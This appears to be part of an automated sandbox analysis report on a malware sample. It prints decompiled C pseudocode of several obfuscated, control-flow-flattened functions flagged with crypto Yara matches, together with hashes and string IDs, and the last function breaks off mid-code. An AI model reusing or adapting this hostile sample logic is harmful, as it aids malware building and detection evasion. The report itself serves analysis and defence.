                          • Opcode Fuzzy Hash: 53059088e70fc9ad6164f25f4c2ccab05de717a6484ce737eb93a46c076b62cc
                          • Instruction Fuzzy Hash: A81200715083809FD3A9CF61C58AA9BFBE1FBD4348F108A1DE5DA96260D7B58948CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01107795, Relevance: 12.7, Strings: 10, Instructions: 225COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E01107795() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t240;
				void* _t247;
				signed int _t248;
				intOrPtr* _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t275;
				signed int* _t279;

				_t279 =  &_v112;
				_v12 = 0x3769c;
				_v4 = 0;
				_v8 = 0x151e38;
				_v56 = 0x3d41f1;
				_v56 = _v56 + 0xffffd857;
				_v16 = 0;
				_t275 = 0x33815b;
				_t251 = 0x1d;
				_push("true");
				_v56 = _v56 / _t251;
				_v56 = _v56 ^ 0x80021b62;
				_v92 = 0xdcca16;
				_v92 = _v92 | 0x76de14f0;
				_v92 = _v92 + 0xffff8ede;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x6f36ea02;
				_v32 = 0x77758c;
				_v32 = _v32 | 0xc8e26dc8;
				_v32 = _v32 ^ 0xc8fd8a5b;
				_v36 = 0xb0485;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0xc127eeb7;
				_v104 = 0xcd60c4;
				_v104 = _v104 << 8;
				_pop(_t252);
				_v104 = _v104 * 0x33;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xa47e43fe;
				_v24 = 0xebb6b2;
				_v24 = _v24 * 0x56;
				_v24 = _v24 ^ 0x4f28e1eb;
				_v96 = 0x7a5126;
				_v96 = _v96 << 6;
				_v96 = _v96 | 0x630628b7;
				_v96 = _v96 + 0x3636;
				_v96 = _v96 ^ 0x7f9f3bbe;
				_v100 = 0x880cf0;
				_v100 = _v100 + 0xffff137b;
				_v100 = _v100 << 6;
				_v100 = _v100 ^ 0x1cd5e106;
				_v100 = _v100 ^ 0x3d16cee0;
				_v60 = 0x1c038;
				_v60 = _v60 + 0x5e48;
				_v60 = _v60 + 0xffffa27b;
				_v60 = _v60 ^ 0x0000fead;
				_v28 = 0x7c413c;
				_v28 = _v28 + 0xffffdb9e;
				_v28 = _v28 ^ 0x0073b996;
				_v64 = 0x7141bf;
				_v64 = _v64 + 0xffff8145;
				_v64 = _v64 / _t252;
				_v64 = _v64 ^ 0x00081e28;
				_v52 = 0x81ec0d;
				_v52 = _v52 >> 1;
				_v52 = _v52 + 0xffffcd38;
				_v52 = _v52 ^ 0x004a5346;
				_v80 = 0xb145f4;
				_t253 = 0x3d;
				_v80 = _v80 / _t253;
				_v80 = _v80 + 0x829b;
				_v80 = _v80 * 0x57;
				_v80 = _v80 ^ 0x012858b7;
				_v84 = 0xd3764b;
				_v84 = _v84 << 8;
				_v84 = _v84 + 0x6fa3;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x76b49c4d;
				_v88 = 0x5d3077;
				_v88 = _v88 + 0x766;
				_v88 = _v88 + 0xffffc987;
				_v88 = _v88 + 0x6eb6;
				_v88 = _v88 ^ 0x005317af;
				_v40 = 0x975c43;
				_t254 = 0x63;
				_t248 = _v16;
				_v40 = _v40 * 0xe;
				_v40 = _v40 ^ 0x0848c60e;
				_v44 = 0x6008c2;
				_v44 = _v44 | 0x3bc5621d;
				_v44 = _v44 ^ 0x3bef26a9;
				_v108 = 0xd2d0da;
				_v108 = _v108 * 0x35;
				_v108 = _v108 + 0xffffff06;
				_v108 = _v108 * 0x13;
				_v108 = _v108 ^ 0x3d4167ed;
				_v112 = 0x257da6;
				_v112 = _v112 + 0x40eb;
				_v112 = _v112 + 0xffff725c;
				_v112 = _v112 / _t254;
				_v112 = _v112 ^ 0x000ff7fb;
				_v68 = 0x6a5fab;
				_v68 = _v68 | 0x92dad95d;
				_v68 = _v68 ^ 0x03dbdb0d;
				_v68 = _v68 >> 6;
				_v68 = _v68 ^ 0x024a0fe3;
				_v72 = 0x2e74b0;
				_v72 = _v72 + 0x3ddf;
				_v72 = _v72 ^ 0x9da7b5bd;
				_v72 = _v72 << 0xa;
				_v72 = _v72 ^ 0x241b801f;
				_v76 = 0x735c6b;
				_v76 = _v76 ^ 0x38220f0e;
				_v76 = _v76 << 7;
				_v76 = _v76 | 0xb98203c4;
				_v76 = _v76 ^ 0xb9ab522c;
				_v48 = 0x3024d6;
				_v48 = _v48 + 0xfffff436;
				_v48 = _v48 >> 1;
				_v48 = _v48 ^ 0x0017b6fb;
				while(1) {
					L1:
					_t255 = 0x5c;
					while(1) {
						_t240 = 0xde0911a;
						do {
							L3:
							if(_t275 == 0x33815b) {
								_t275 = 0xb9bce4;
								goto L15;
							} else {
								if(_t275 == 0xb9bce4) {
									_t250 =  *0x1125218 + 0x234;
									while(1) {
										__eflags =  *_t250 - _t255;
										if(__eflags == 0) {
											break;
										}
										_t250 = _t250 + 2;
										__eflags = _t250;
									}
									_t248 = _t250 + 2;
									_t275 = 0x367b54d;
									_t240 = 0xde0911a;
									continue;
								} else {
									if(_t275 == 0x367b54d) {
										_push(_v104);
										_push(_v36);
										__eflags = E0110975A(0x11010a0,  &_v20, _v92, _v24, _v56, _v96, _v100, _v60, _v28, _v64, 0x11010a0, 0x11010a0, E0111CD35(0x11010a0, _v32, __eflags));
										_t275 =  ==  ? 0xde0911a : 0xd16896e;
										E0111629F(_v52, _t241, _v80, _v84, _v88);
										_t279 =  &(_t279[0x10]);
										_t240 = 0xde0911a;
										_t255 = 0x5c;
										goto L15;
									} else {
										if(_t275 == 0x99837b9) {
											E01109FE4(_v20, _v68, _v72, _v76, _v48);
										} else {
											if(_t275 != _t240) {
												goto L15;
											} else {
												_t247 = E0110ED15(_v20, _v40, _v44, _t248, _v108, _v112);
												_t279 =  &(_t279[4]);
												_t275 = 0x99837b9;
												_v16 = 0 | _t247 == 0x00000000;
												goto L1;
											}
										}
									}
								}
							}
							L18:
							return _v16;
							L15:
							__eflags = _t275 - 0xd16896e;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}










































                          0x01107795
                          0x01107798
                          0x011077a2
                          0x011077a8
                          0x011077b0
                          0x011077b8
                          0x011077c4
                          0x011077c8
                          0x011077d3
                          0x011077d6
                          0x011077d8
                          0x011077de
                          0x011077e6
                          0x011077ee
                          0x011077f6
                          0x011077fe
                          0x01107803
                          0x0110780b
                          0x01107813
                          0x0110781b
                          0x01107823
                          0x0110782b
                          0x01107830
                          0x01107838
                          0x01107840
                          0x0110784a
                          0x0110784d
                          0x01107851
                          0x01107856
                          0x0110785e
                          0x0110786b
                          0x0110786f
                          0x01107877
                          0x0110787f
                          0x01107884
                          0x0110788c
                          0x01107894
                          0x0110789c
                          0x011078a4
                          0x011078ac
                          0x011078b1
                          0x011078b9
                          0x011078c1
                          0x011078c9
                          0x011078d1
                          0x011078d9
                          0x011078e1
                          0x011078e9
                          0x011078f1
                          0x011078f9
                          0x01107901
                          0x01107911
                          0x01107915
                          0x0110791d
                          0x01107925
                          0x01107929
                          0x01107931
                          0x01107939
                          0x01107945
                          0x01107948
                          0x0110794c
                          0x01107959
                          0x0110795d
                          0x01107965
                          0x0110796f
                          0x01107979
                          0x01107981
                          0x01107986
                          0x0110798e
                          0x01107996
                          0x0110799e
                          0x011079a6
                          0x011079ae
                          0x011079b6
                          0x011079c5
                          0x011079c6
                          0x011079ca
                          0x011079ce
                          0x011079d6
                          0x011079de
                          0x011079e6
                          0x011079ee
                          0x011079fb
                          0x011079ff
                          0x01107a0c
                          0x01107a10
                          0x01107a18
                          0x01107a20
                          0x01107a28
                          0x01107a36
                          0x01107a3a
                          0x01107a42
                          0x01107a4a
                          0x01107a52
                          0x01107a5a
                          0x01107a5f
                          0x01107a67
                          0x01107a6f
                          0x01107a77
                          0x01107a7f
                          0x01107a84
                          0x01107a8c
                          0x01107a94
                          0x01107a9c
                          0x01107aa1
                          0x01107aa9
                          0x01107ab1
                          0x01107ab9
                          0x01107ac1
                          0x01107ac5
                          0x01107acd
                          0x01107acd
                          0x01107acf
                          0x01107ad0
                          0x01107ad0
                          0x01107ad5
                          0x01107ad5
                          0x01107adb
                          0x01107bd4
                          0x00000000
                          0x01107ae1
                          0x01107ae3
                          0x01107bb7
                          0x01107bc2
                          0x01107bc2
                          0x01107bc5
                          0x00000000
                          0x00000000
                          0x01107bbf
                          0x01107bbf
                          0x01107bbf
                          0x01107bc7
                          0x01107bca
                          0x01107ad0
                          0x00000000
                          0x01107ae9
                          0x01107aef
                          0x01107b34
                          0x01107b3d
                          0x01107b7f
                          0x01107b9c
                          0x01107b9f
                          0x01107ba4
                          0x01107ba7
                          0x01107bae
                          0x00000000
                          0x01107af1
                          0x01107af7
                          0x01107bf8
                          0x01107afd
                          0x01107aff
                          0x00000000
                          0x01107b05
                          0x01107b1a
                          0x01107b21
                          0x01107b26
                          0x01107b2e
                          0x00000000
                          0x01107b2e
                          0x01107aff
                          0x01107af7
                          0x01107aef
                          0x01107ae3
                          0x01107c00
                          0x01107c0b
                          0x01107bd6
                          0x01107bd6
                          0x01107bd6
                          0x00000000
                          0x01107be2
                          0x01107ad0

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &Qz$66$<A|$FSJ$H^$k\s$w0]$@$gA=$(O
                          • API String ID: 0-3837304947
                          • Opcode ID: c7fecfd1e296520893a604f589e68dc454336136bdf4315821dfe0d2a1b28104
                          • Instruction ID: f13c02caf67a211d5dc9aa8fc25b1b162340469ddc2e6690811d70de5099bc99
                          • Opcode Fuzzy Hash: c7fecfd1e296520893a604f589e68dc454336136bdf4315821dfe0d2a1b28104
                          • Instruction Fuzzy Hash: 51B12F729097819FC399CF29C98980FBBF1BBC4758F504A1DF295962A0D3B18A49CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0112261E, Relevance: 12.7, Strings: 10, Instructions: 201COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 96%
                          			E0112261E(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t199;
				signed int _t201;
				signed int _t203;
				void* _t206;
				signed int _t208;
				signed int _t209;
				void* _t224;
				void* _t225;
				signed int* _t228;

				_t228 =  &_v96;
				_v8 = _v8 & 0x00000000;
				_v4 = _v4 & 0x00000000;
				_v16 = 0x13f6e3;
				_v12 = 0xf1f80a;
				_v44 = 0xfb1edb;
				_t224 = __edx;
				_t206 = __ecx;
				_t225 = 0x4fb10bf;
				_t208 = 0x7d;
				_v44 = _v44 / _t208;
				_v44 = _v44 ^ 0x00020bb5;
				_v68 = 0x95b457;
				_v68 = _v68 + 0xffff80a6;
				_v68 = _v68 + 0xf3cf;
				_v68 = _v68 ^ 0x0097bbfe;
				_v64 = 0xfe40e7;
				_t209 = 0x7b;
				_v64 = _v64 * 0x2e;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0xeb83aa68;
				_v96 = 0xadf696;
				_v96 = _v96 * 3;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 * 0x74;
				_v96 = _v96 ^ 0x003a584e;
				_v32 = 0xe93227;
				_v32 = _v32 + 0x6b73;
				_v32 = _v32 ^ 0x00e805b4;
				_v36 = 0x3c30e7;
				_v36 = _v36 | 0xdee0074a;
				_v36 = _v36 ^ 0xdefaf98e;
				_v40 = 0x1efef8;
				_v40 = _v40 | 0xdf1c2796;
				_v40 = _v40 ^ 0xdf1ee469;
				_v92 = 0xd2dd9e;
				_v92 = _v92 >> 9;
				_t57 =  &_v92; // 0x9
				_v92 =  *_t57 * 0x76;
				_v92 = _v92 | 0xc83581eb;
				_v92 = _v92 ^ 0xc8391980;
				_v56 = 0x4a018f;
				_v56 = _v56 + 0xffffa7db;
				_v56 = _v56 | 0x832de762;
				_v56 = _v56 ^ 0x83627da2;
				_v28 = 0x6201a0;
				_v28 = _v28 / _t209;
				_v28 = _v28 ^ 0x00045532;
				_v60 = 0x64cc7b;
				_v60 = _v60 * 0x6a;
				_v60 = _v60 << 0xf;
				_v60 = _v60 ^ 0x557fa729;
				_v76 = 0x39ae4b;
				_v76 = _v76 ^ 0xc1a4e08e;
				_v76 = _v76 << 0xe;
				_v76 = _v76 + 0x737c;
				_v76 = _v76 ^ 0x53b3b245;
				_v80 = 0x43b44d;
				_v80 = _v80 + 0xffffd108;
				_v80 = _v80 ^ 0xb3a85a57;
				_v80 = _v80 * 0x16;
				_v80 = _v80 ^ 0x76466d58;
				_v52 = 0x43a350;
				_v52 = _v52 + 0xb5e1;
				_v52 = _v52 + 0x6429;
				_v52 = _v52 ^ 0x004d0aff;
				_v84 = 0x69869a;
				_t210 = 0x63;
				_v84 = _v84 * 0x13;
				_v84 = _v84 + 0xda19;
				_v84 = _v84 ^ 0x1d311734;
				_v84 = _v84 ^ 0x1aea7160;
				_v88 = 0x1d035e;
				_v88 = _v88 << 0xc;
				_v88 = _v88 * 0x51;
				_v88 = _v88 + 0xffff4d79;
				_v88 = _v88 ^ 0xe1072623;
				_v48 = 0xaf1ee2;
				_v48 = _v48 >> 4;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x0006a00c;
				_v72 = 0x859658;
				_v72 = _v72 | 0xc5b36f1e;
				_v72 = _v72 * 0x73;
				_v72 = _v72 << 0xd;
				_v72 = _v72 ^ 0xf6e599a4;
				_v20 = 0x9d3fd6;
				_t199 = _v20;
				_t221 = _t199 % _t210;
				_v20 = _t199 / _t210;
				_v20 = _v20 ^ 0x0000c172;
				_v24 = 0x563333;
				_v24 = _v24 | 0xbe94e07b;
				_v24 = _v24 ^ 0xbedae89d;
				while(1) {
					L1:
					_t201 = 0x273cd46;
					do {
						L2:
						while(_t225 != 0x1acfa64) {
							if(_t225 == _t201) {
								_t201 = E0110AD82(_v76, _t221, _v80, _t224, _v76, _v76, _v52, _v84, _t210, _v88, E0111E3B5);
								_t228 =  &(_t228[9]);
								 *(_t224 + 0x34) = _t201;
								__eflags = _t201;
								if(__eflags == 0) {
									_t225 = 0x1acfa64;
									goto L1;
								}
							} else {
								if(_t225 == 0x42103da) {
									_t221 = _v56;
									_t210 =  *(_t224 + 0x20);
									_t203 = E011136D5( *(_t224 + 0x20), _v56, _v28, _v60);
									_t228 =  &(_t228[2]);
									 *(_t224 + 0x28) = _t203;
									__eflags = _t203;
									_t201 = 0x273cd46;
									_t225 =  !=  ? 0x273cd46 : 0x1acfa64;
									continue;
								} else {
									if(_t225 == 0x4a0fd12) {
										_push(_v68);
										_t201 = E011040E2(_v44, _t206, __eflags, _t210);
										 *(_t224 + 0x20) = _t201;
										__eflags = _t201;
										if(_t201 != 0) {
											E0110C9A9(_v64, _t201, _t201, _v96);
											_push( *(_t224 + 0x20));
											_push(_v92);
											_push(_v40);
											_t221 = _v36;
											_t210 = _v32;
											E011162F5(_v32, _v36);
											_t228 =  &(_t228[5]);
											_t225 = 0x42103da;
											while(1) {
												L1:
												_t201 = 0x273cd46;
												goto L2;
											}
										}
									} else {
										if(_t225 != 0x4fb10bf) {
											goto L14;
										} else {
											_t225 = 0x4a0fd12;
											continue;
										}
									}
								}
							}
							goto L15;
						}
						_t221 = _v72;
						_t210 = _v48;
						E0110715A(_v48, _v72, _v20, _v24,  *(_t224 + 0x20));
						_t228 =  &(_t228[3]);
						_t225 = 0x69342d1;
						_t201 = 0x273cd46;
						L14:
						__eflags = _t225 - 0x69342d1;
					} while (__eflags != 0);
					L15:
					return _t201;
				}
			}




































                          0x0112261e
                          0x01122621
                          0x01122626
                          0x0112262b
                          0x01122633
                          0x0112263b
                          0x0112264b
                          0x0112264d
                          0x01122653
                          0x01122658
                          0x0112265d
                          0x01122663
                          0x0112266b
                          0x01122673
                          0x0112267b
                          0x01122683
                          0x0112268b
                          0x01122698
                          0x01122699
                          0x011226a2
                          0x011226a6
                          0x011226ae
                          0x011226bb
                          0x011226bf
                          0x011226c9
                          0x011226cd
                          0x011226d5
                          0x011226dd
                          0x011226e5
                          0x011226ed
                          0x011226f5
                          0x011226fd
                          0x01122705
                          0x0112270d
                          0x01122715
                          0x0112271d
                          0x01122725
                          0x0112272a
                          0x0112272f
                          0x01122733
                          0x0112273b
                          0x01122743
                          0x0112274b
                          0x01122753
                          0x0112275b
                          0x01122763
                          0x01122771
                          0x01122775
                          0x0112277d
                          0x0112278a
                          0x0112278e
                          0x01122793
                          0x0112279b
                          0x011227a3
                          0x011227ab
                          0x011227b0
                          0x011227b8
                          0x011227c0
                          0x011227c8
                          0x011227d0
                          0x011227dd
                          0x011227e1
                          0x011227e9
                          0x011227f1
                          0x011227f9
                          0x01122803
                          0x01122810
                          0x0112281f
                          0x01122820
                          0x01122824
                          0x0112282c
                          0x01122834
                          0x0112283c
                          0x01122844
                          0x0112284e
                          0x01122852
                          0x0112285a
                          0x01122862
                          0x0112286a
                          0x0112286f
                          0x01122874
                          0x0112287c
                          0x01122884
                          0x01122891
                          0x01122895
                          0x0112289a
                          0x011228a2
                          0x011228aa
                          0x011228ae
                          0x011228b0
                          0x011228b4
                          0x011228bc
                          0x011228c4
                          0x011228cc
                          0x011228d4
                          0x011228d4
                          0x011228d4
                          0x011228d9
                          0x00000000
                          0x011228d9
                          0x011228e3
                          0x011229a6
                          0x011229ab
                          0x011229ae
                          0x011229b1
                          0x011229b3
                          0x011229b5
                          0x00000000
                          0x011229b5
                          0x011228e9
                          0x011228ef
                          0x01122966
                          0x0112296a
                          0x0112296d
                          0x01122972
                          0x01122975
                          0x01122978
                          0x0112297c
                          0x01122981
                          0x00000000
                          0x011228f1
                          0x011228f7
                          0x0112290c
                          0x01122917
                          0x0112291c
                          0x01122921
                          0x01122923
                          0x01122934
                          0x01122939
                          0x0112293c
                          0x01122940
                          0x01122944
                          0x01122948
                          0x0112294c
                          0x01122951
                          0x01122954
                          0x011228d4
                          0x011228d4
                          0x011228d4
                          0x00000000
                          0x011228d4
                          0x011228d4
                          0x011228f9
                          0x011228ff
                          0x00000000
                          0x01122905
                          0x01122905
                          0x00000000
                          0x01122905
                          0x011228ff
                          0x011228f7
                          0x011228ef
                          0x00000000
                          0x011228e3
                          0x011229c7
                          0x011229cb
                          0x011229cf
                          0x011229d4
                          0x011229d7
                          0x011229dc
                          0x011229e1
                          0x011229e1
                          0x011229e1
                          0x011229f4
                          0x011229f4
                          0x011229f4

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: NX:$'2$)d$33V$NX:$NX:$XmFv$sk$|s$0<
                          • API String ID: 0-1033120914
                          • Opcode ID: 654ebe0ffdbd455c2c0d39a6344b8ffc7aa2c6afb9d9883bc43c11f6ac19aef9
                          • Instruction ID: 3db0fc48d9613d5c94f8572671563b30962b4a3fda19d2dd7e10e2eee8fbeb60
                          • Opcode Fuzzy Hash: 654ebe0ffdbd455c2c0d39a6344b8ffc7aa2c6afb9d9883bc43c11f6ac19aef9
                          • Instruction Fuzzy Hash: 5AA140719083819FC358CF29C58940BFBE1BBD4758F009A1DF596AA260E3B5DA58CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01111591, Relevance: 11.9, Strings: 9, Instructions: 624COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E01111591(intOrPtr __ecx, intOrPtr* __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				intOrPtr* _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t610;
				signed int _t662;
				signed int _t668;
				void* _t669;
				intOrPtr _t677;
				void* _t687;
				intOrPtr* _t689;
				signed int _t694;
				intOrPtr _t697;
				int _t700;
				intOrPtr _t704;
				intOrPtr _t711;
				signed int _t712;
				signed int _t713;
				intOrPtr _t714;
				intOrPtr* _t720;
				signed int _t741;
				void* _t780;
				void* _t787;
				void* _t794;
				void* _t795;
				void* _t796;
				signed int _t798;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				intOrPtr _t813;
				void* _t814;
				void* _t817;
				void* _t821;
				signed int _t823;
				intOrPtr _t824;
				signed int* _t825;
				void* _t829;

				_t825 =  &_v560;
				_v296 = __edx;
				_v500 = __ecx;
				_v308 = 0x34a367;
				_v308 = _v308 >> 0x10;
				_t610 = 0x34;
				_v308 = _v308 ^ _t610;
				_t817 = 0xea2f645;
				_v544 = 0xb8bac1;
				_v544 = _v544 << 0xa;
				_v544 = _v544 + 0xdd4e;
				_v544 = _v544 | 0x419410b7;
				_v544 = _v544 ^ 0xe3f195cc;
				_v324 = 0x787f17;
				_v324 = _v324 + 0xffffba2f;
				_v324 = _v324 ^ 0x007da03d;
				_v380 = 0x7ae48a;
				_v380 = _v380 + 0xc297;
				_v380 = _v380 ^ 0x00775dd8;
				_v504 = 0xe211d8;
				_push("true");
				_pop(_t712);
				_v504 = _v504 * 0x73;
				_v504 = _v504 + 0x796b;
				_v504 = _v504 << 7;
				_v504 = _v504 ^ 0xc7330412;
				_v452 = 0xdce441;
				_v452 = _v452 + 0xffffe6d5;
				_v452 = _v452 / _t712;
				_v452 = _v452 ^ 0x000328d8;
				_v316 = 0x2bb0df;
				_t802 = 0x48;
				_v316 = _v316 * 0x36;
				_v316 = _v316 ^ 0x0939efeb;
				_v356 = 0xcad995;
				_v356 = _v356 * 0x55;
				_v356 = _v356 ^ 0x43500611;
				_v436 = 0xa94819;
				_v436 = _v436 / _t802;
				_v436 = _v436 << 0xa;
				_v436 = _v436 ^ 0x096cc0d5;
				_v404 = 0xcd31f2;
				_v404 = _v404 >> 9;
				_v404 = _v404 / _t712;
				_v404 = _v404 ^ 0x0006c8f5;
				_v348 = 0x543f35;
				_v348 = _v348 ^ 0x72886b43;
				_v348 = _v348 ^ 0x72d10eb7;
				_v536 = 0x1951a2;
				_t803 = 0x6f;
				_v536 = _v536 / _t803;
				_v536 = _v536 << 2;
				_v536 = _v536 ^ 0x5e9308a1;
				_v536 = _v536 ^ 0x5e95c1b7;
				_v420 = 0x5bda6e;
				_v420 = _v420 + 0xbe40;
				_v420 = _v420 * 0x29;
				_v420 = _v420 ^ 0x0ed93f0e;
				_v372 = 0xbac8fa;
				_v372 = _v372 ^ 0x6eee89e1;
				_v372 = _v372 ^ 0x6e5995b3;
				_v444 = 0x831612;
				_v444 = _v444 + 0xffff13c8;
				_v444 = _v444 + 0xffff4520;
				_v444 = _v444 ^ 0x0089c369;
				_v364 = 0x1eb95;
				_t823 = 0x78;
				_v364 = _v364 / _t823;
				_v364 = _v364 ^ 0x000f7d8c;
				_v388 = 0x78cb3e;
				_t804 = 0x68;
				_v388 = _v388 / _t804;
				_v388 = _v388 ^ 0x000e12a4;
				_v472 = 0xfe8b39;
				_v472 = _v472 ^ 0x4a79d81a;
				_v472 = _v472 | 0x4684679d;
				_v472 = _v472 ^ 0xb86bdad5;
				_v472 = _v472 ^ 0xf6e974af;
				_v508 = 0xf7b85e;
				_v508 = _v508 + 0xffff1a7c;
				_v508 = _v508 >> 8;
				_v508 = _v508 ^ 0x91f47709;
				_v508 = _v508 ^ 0x91fdf719;
				_v360 = 0xb3ef91;
				_v360 = _v360 << 1;
				_v360 = _v360 ^ 0x016ac8eb;
				_v516 = 0xc83176;
				_v516 = _v516 >> 3;
				_v516 = _v516 << 7;
				_t805 = 0x60;
				_v516 = _v516 / _t805;
				_v516 = _v516 ^ 0x00216802;
				_v524 = 0x99d0bf;
				_t713 = 0x2e;
				_v524 = _v524 / _t713;
				_v524 = _v524 | 0x32ed1f8e;
				_v524 = _v524 << 8;
				_v524 = _v524 ^ 0xef580268;
				_v520 = 0xec019;
				_v520 = _v520 << 7;
				_v520 = _v520 >> 8;
				_v520 = _v520 + 0xffff3d31;
				_v520 = _v520 ^ 0x000f9caf;
				_v428 = 0x847880;
				_v428 = _v428 ^ 0x2d8b13d9;
				_v428 = _v428 + 0x571a;
				_v428 = _v428 ^ 0x2d08cc52;
				_v412 = 0x94859;
				_v412 = _v412 << 0xa;
				_v412 = _v412 >> 0xa;
				_v412 = _v412 ^ 0x0001710a;
				_v300 = 0x507a00;
				_v300 = _v300 ^ 0x479f05f7;
				_v300 = _v300 ^ 0x47c7f35c;
				_v480 = 0x5775fb;
				_v480 = _v480 | 0x3774da5c;
				_v480 = _v480 + 0xffff1fad;
				_v480 = _v480 << 4;
				_v480 = _v480 ^ 0x777d225e;
				_v456 = 0xf57b23;
				_v456 = _v456 >> 0xf;
				_v456 = _v456 ^ 0xca18f90f;
				_v456 = _v456 ^ 0xca1daf67;
				_v460 = 0x7bc476;
				_v460 = _v460 >> 9;
				_v460 = _v460 >> 0xc;
				_v460 = _v460 ^ 0x000f4177;
				_v396 = 0x39e094;
				_v396 = _v396 >> 5;
				_v396 = _v396 << 0xd;
				_v396 = _v396 ^ 0x39e28150;
				_v488 = 0x70552;
				_v488 = _v488 << 0xa;
				_v488 = _v488 ^ 0x8d9a573e;
				_v488 = _v488 + 0xffffa6c3;
				_v488 = _v488 ^ 0x91806b88;
				_v448 = 0x8da13a;
				_v448 = _v448 << 0xa;
				_t806 = 0x16;
				_v448 = _v448 * 0x5f;
				_v448 = _v448 ^ 0x3b51015c;
				_v512 = 0xddb448;
				_v512 = _v512 << 9;
				_v512 = _v512 >> 0xe;
				_v512 = _v512 >> 8;
				_v512 = _v512 ^ 0x000fce2e;
				_v548 = 0xc52d6d;
				_v548 = _v548 ^ 0x08838af8;
				_v548 = _v548 << 5;
				_v548 = _v548 / _t823;
				_v548 = _v548 ^ 0x00188708;
				_v552 = 0x8ecc4c;
				_v552 = _v552 / _t806;
				_v552 = _v552 * 0xe;
				_v552 = _v552 << 0xc;
				_v552 = _v552 ^ 0xadfad4dc;
				_v340 = 0x57b067;
				_v340 = _v340 * 0x41;
				_v340 = _v340 ^ 0x164d2235;
				_v556 = 0x43c70a;
				_v556 = _v556 ^ 0x7f907696;
				_v556 = _v556 | 0xbacc01dc;
				_v556 = _v556 + 0xffff5123;
				_v556 = _v556 ^ 0xffd9e2b4;
				_v376 = 0x7b30da;
				_v376 = _v376 + 0x200b;
				_v376 = _v376 ^ 0x0072d724;
				_v440 = 0x67eef8;
				_v440 = _v440 >> 0xe;
				_v440 = _v440 + 0x5160;
				_v440 = _v440 ^ 0x000fcbf1;
				_v384 = 0x368c0f;
				_v384 = _v384 / _t713;
				_v384 = _v384 ^ 0x0007162a;
				_v332 = 0xf7e74f;
				_v332 = _v332 + 0xb023;
				_v332 = _v332 ^ 0x00fabd9f;
				_v304 = 0xa5764c;
				_v304 = _v304 + 0xffff6f82;
				_v304 = _v304 ^ 0x00aa90b6;
				_v464 = 0x7a1571;
				_v464 = _v464 << 8;
				_v464 = _v464 + 0xd5fa;
				_v464 = _v464 ^ 0x7a16e9d6;
				_v432 = 0x65ae54;
				_v432 = _v432 | 0xf549fffc;
				_v432 = _v432 ^ 0xf56ac653;
				_v368 = 0x9cc546;
				_v368 = _v368 << 0xe;
				_v368 = _v368 ^ 0x31533563;
				_v532 = 0xbb333f;
				_t807 = 0x34;
				_v532 = _v532 / _t807;
				_v532 = _v532 + 0xfffff079;
				_v532 = _v532 + 0x8871;
				_v532 = _v532 ^ 0x000afd0d;
				_v540 = 0xad9ffb;
				_v540 = _v540 + 0x1d27;
				_v540 = _v540 + 0xffffe294;
				_v540 = _v540 >> 2;
